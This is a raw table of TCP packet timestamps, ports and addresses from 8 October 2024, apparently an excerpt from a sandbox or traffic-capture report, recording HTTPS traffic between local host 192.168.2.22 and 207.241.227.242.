                                                                                                                                                                                                                    Oct 8, 2024 15:24:18.913178921 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:18.913197994 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:18.913213968 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:18.913213968 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:18.914211988 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:18.914252996 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:18.914279938 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:18.914294958 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:18.914330959 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:18.914572954 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:18.914623976 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:18.914658070 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:18.914665937 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:18.914675951 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:18.915036917 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:18.915074110 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:18.915107965 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:18.915117979 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:18.915143967 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:18.915165901 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:18.977860928 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:18.977890968 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:18.977931023 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:18.977947950 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:18.977958918 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:18.977966070 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:18.986802101 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:18.986838102 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:18.986876965 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:18.986886978 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:18.986905098 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:18.998250008 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:18.998274088 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:18.998313904 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:18.998323917 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:18.998334885 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:18.998390913 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.000228882 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.000260115 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.000294924 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.000303030 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.000312090 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.000341892 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.002034903 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.002067089 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.002094984 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.002103090 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.002118111 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.002146006 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.002795935 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.002819061 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.002856970 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.002866030 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.002875090 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.003674030 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.003705025 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.003732920 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.003741980 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.003751993 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.003786087 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.004189014 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.004213095 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.004241943 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.004251957 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.004262924 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.004287958 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.067096949 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.067133904 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.067158937 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.067169905 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.067188978 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.067248106 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.075829983 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.075839996 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.075879097 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.075895071 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.075911045 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.075932026 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.077096939 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.087286949 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.087315083 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.087388992 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.087404966 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.087421894 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.088520050 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.088550091 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.088592052 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.088593960 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.088602066 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.088613033 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.090493917 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.090521097 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.090550900 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.090564013 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.090574026 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.090590000 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.091243982 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.091273069 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.091308117 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.091315985 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.091325998 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.091339111 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.091823101 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.091854095 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.091885090 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.091895103 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.091906071 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.091906071 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.091929913 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.092911005 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.092938900 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.092972994 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.092978954 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.092992067 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.093022108 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.155942917 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.155982018 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.156033039 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.156054020 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.156064987 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.156116962 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.164597034 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.164628983 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.164669991 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.164684057 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.164700031 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.164849997 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.175767899 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.175796986 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.175879955 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.175879955 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.175895929 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.176121950 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.177273989 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.177309036 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.177362919 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.177362919 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.177378893 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.177627087 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.179128885 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.179157019 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.179194927 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.179209948 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.179274082 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.179286957 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.179696083 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.179722071 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.179779053 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.179779053 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.179791927 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.179824114 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.180434942 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.180481911 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.180547953 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.180547953 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.180547953 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.180567026 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.180963993 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.180988073 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.181099892 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.181099892 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.181111097 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.244513035 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.244551897 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.244676113 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.244676113 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.244676113 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.244697094 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.253701925 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.253742933 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.253765106 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.253776073 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.253815889 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.253815889 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.253829002 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.264528036 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.264539957 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.264568090 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.264575958 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.264750957 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.264765978 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.264803886 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.264805079 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.265897989 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.265928984 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.265964985 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.265990019 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.265990019 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.265990019 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.265999079 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.266079903 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.268004894 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.268032074 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.268120050 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.268120050 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.268120050 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.268135071 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.268793106 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.268826008 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.268898964 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.268898964 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.268898964 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.268912077 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.269788980 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.269810915 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.269881010 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.269881964 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.269881964 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.269891977 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.270412922 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.270442963 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.270473003 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.270482063 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.270494938 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.333877087 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.333908081 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.334008932 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.334008932 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.334027052 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.334080935 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.342351913 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.342365026 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.342394114 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.342401981 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.342447996 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.342447996 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.342473984 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.353477001 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.353526115 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.353543997 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.353557110 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.353585958 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.353599072 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.353609085 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.353682041 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.353682041 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.354688883 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.354712963 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.354756117 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.354765892 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.354790926 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.356692076 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.356722116 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.356833935 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.356833935 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.356847048 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.357489109 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.357513905 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.357554913 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.357564926 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.357651949 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.357651949 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.358086109 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.358109951 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.358191013 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.358191013 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.358201027 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.359337091 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.359365940 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.359404087 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.359412909 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.359591007 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.359591007 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.422615051 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.422641993 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.422722101 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.422722101 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.422765970 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.423213959 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.431071997 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.431108952 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:19.431210995 CEST49176443192.168.2.22207.241.227.242
